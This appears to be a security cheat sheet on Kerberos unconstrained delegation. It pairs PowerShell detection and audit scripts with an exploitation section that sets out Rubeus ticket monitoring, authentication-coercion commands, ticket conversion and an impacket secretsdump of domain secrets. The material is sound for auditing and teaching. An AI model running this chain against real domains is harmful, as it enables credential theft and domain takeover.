Kerberos Unconstrained Delegation
Unconstrained Delegation is an Active Directory feature that allows designated services to act on behalf of users and request access to other network resources without additional authentication. When a user authenticates to a service whose account is trusted for unconstrained delegation, the KDC includes a forwardable copy of the user's TGT in the service ticket, and that TGT is cached on the service host. The service can therefore impersonate that user to any other service in the domain, not just a defined set. This broad authority is what makes the feature a serious security risk when it is enabled on anything other than the domain controllers, which have it by design.
Detecting Unconstrained Delegation
Computers with the flag set (primaryGroupID 515 excludes domain controllers, which hold the flag by default):

    Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
All computers with the flag set, including domain controllers:

    Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation,servicePrincipalName,Description |
        Format-List Name,TrustedForDelegation,servicePrincipalName,Description
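The two queries above only cover computer objects. As an added audit example (not from the original page), the script below uses the userAccountControl bit that backs the TrustedForDelegation attribute to find both computer and user accounts with unconstrained delegation, separates domain controllers from everything else, and lists Domain Admins that are not marked "sensitive and cannot be delegated". It assumes the ActiveDirectory RSAT module is installed; the function name is my own.

```powershell
# Added audit script; not part of the original page.
# Requires the ActiveDirectory module (RSAT) and read access to the domain.
Import-Module ActiveDirectory

function Get-UnconstrainedDelegationAudit {
    # userAccountControl bit TRUSTED_FOR_DELEGATION = 0x80000 (524288).
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule, so this
    # filter matches regardless of which other UAC bits are set.
    $filter = '(userAccountControl:1.2.840.113556.1.4.803:=524288)'

    # Computers and users are different object classes; query both.
    $objects = @()
    $objects += Get-ADComputer -LDAPFilter $filter `
        -Properties primaryGroupID, servicePrincipalName, Description, LastLogonDate
    $objects += Get-ADUser -LDAPFilter $filter `
        -Properties servicePrincipalName, Description, LastLogonDate

    foreach ($obj in $objects) {
        # primaryGroupID 516 = Domain Controllers, 521 = Read-only Domain Controllers.
        $isDC = ($obj.ObjectClass -eq 'computer') -and ($obj.primaryGroupID -in 516, 521)
        [pscustomobject]@{
            Name        = $obj.Name
            ObjectClass = $obj.ObjectClass
            Finding     = if ($isDC) { 'expected: domain controller' }
                          else       { 'REVIEW: unconstrained delegation on non-DC' }
            SPNs        = ($obj.servicePrincipalName -join '; ')
            LastLogon   = $obj.LastLogonDate
            Description = $obj.Description
        }
    }
}

function Get-DelegatablePrivilegedAccounts {
    # Privileged accounts should carry the "Account is sensitive and cannot be
    # delegated" flag (or sit in Protected Users) so a compromised
    # unconstrained-delegation host cannot reuse their TGTs.
    Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        Get-ADUser -Properties AccountNotDelegated |
        Where-Object { -not $_.AccountNotDelegated } |
        Select-Object SamAccountName, Enabled, @{n='Finding'; e={'REVIEW: privileged account is delegatable'}}
}

Get-UnconstrainedDelegationAudit | Format-Table -AutoSize
Get-DelegatablePrivilegedAccounts | Format-Table -AutoSize
```

Any non-DC row from the first function, and any row at all from the second, is a finding to track to remediation (remove the flag, or move the account to Protected Users).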
Exploitation
Monitor incoming Kerberos tickets (TGTs cached on the host with unconstrained delegation):

    .\Rubeus.exe monitor /interval:5 /nowrap

Monitor for a specific user:

    .\Rubeus.exe monitor /interval:10 /targetuser:$target_user /nowrap

Request a delegation TGT for the current computer account (tgtdeleg):

    .\Rubeus.exe tgtdeleg /nowrap
Coerce Authentication
Trigger authentication from the target system. In the commands below, $target_Domain is the host with unconstrained delegation (where the listener runs) and $IP is the system whose authentication is coerced:

    xp_dirtree \\$target_Domain\share

    coercer coerce -u $user -p '$pass' -d $Domain -l $target_Domain -t $IP

    python3 coercer.py -u $user -h <hash> -d $Domain -l $target_Domain -t $IP

    nxc smb $ip -u $user -p '$pass' -M coerce_plus -o LISTENER=$target_Domain ALWAYS=true
Decode Base64 Ticket
Paste the base64 ticket into a file and decode it:

    nano ticket.kirbi.b64
    base64 -d ticket.kirbi.b64 > DC.kirbi

or

    echo "<ticket>" | base64 -d > DC.kirbi

Convert the .kirbi file to a ccache:

    impacket-ticketConverter DC.kirbi DC.ccache
Set ccache:

    export KRB5CCNAME=DC.ccache

Dump domain secrets:

    impacket-secretsdump -k -no-pass -just-dc $Domain